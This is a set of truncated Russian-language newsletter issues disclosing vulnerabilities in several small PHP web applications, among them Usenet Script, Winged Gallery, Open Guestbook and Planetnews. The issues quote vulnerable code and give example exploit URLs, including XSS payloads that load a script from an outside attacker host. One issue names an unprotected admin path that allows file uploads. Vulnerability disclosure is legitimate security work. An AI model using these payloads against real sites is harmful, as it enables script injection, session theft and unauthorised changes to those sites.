Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Usenet Script.
Компьютер для продвинутых пользователей В этом выпуске: Usenet Script ПО: Usenet Script Версия: 0.5 О Usenet Script: Срипт новостей использующий SQL базу данных. При разработке использовались базы данных Postgresql, но она использует dbx и должна, поэтому работать в других системах баз данных. Описание: В файле index.php не проверяется переменная group, что позволяет применить XSS-атаку, вставив JavaSciript код. Пример использования: http://www.example.com/index.php?group=<script src=http://www.youfuckt...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Winged Gallery.
Компьютер для продвинутых пользователей В этом выпуске: Winged Gallery ПО: Winged Gallery Версия: 1.0 Пример использования: http://example.com/gallery/thumb.php?image=data/Example+Folder/firefox+icon.jpg><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT> > Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: ICQ - 273214003 e-mail - isdmi1:mail.ru ...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Open Guestbook.
Компьютер для продвинутых пользователей В этом выпуске: Open Guestbook ПО: Open Guestbook Версия: 0.15 Описание: В продукте есть возможность провести XSS атаку. Уязвимый код в файле header.php: [1] <html> [2] [3] <head> [4] [5] <title><? echo $title"; ?></title> Есть возможность провести SQL-инъекцию. Уязвимый код в файле view.php: [23] if (empty$offset) { [24] $offset=0; [25] } [26] [27] // get results [28] $result=mysql_query"SELECT * FROM $tentries ORDER BY ID DESC limit $o...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Planetnews.
Компьютер для продвинутых пользователей В этом выпуске: Planetnews ПО: Planetnews Версия: n/a Сайт: http://www.planetc.de Описание: Перейдя по пути "admin/planetnews.php, мы получаем возможность добавлять или удалять новости, а так же закачивать на сервер файлы. Пример использования: http://www.site.com/news/admin/planetnews.php Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: ICQ - 273214003 e-mail - isdmi1:mail.ru ...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в MyMail Directory.
Компьютер для продвинутых пользователей В этом выпуске: MyMail Directory ПО: MyMail Directory Версия: 1.0 Пример использования: http://www.site.com/[MyMail_path]/admin/login.php=error[XSS] Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: ICQ - 273214003 e-mail - isdmi1:mail.ru ...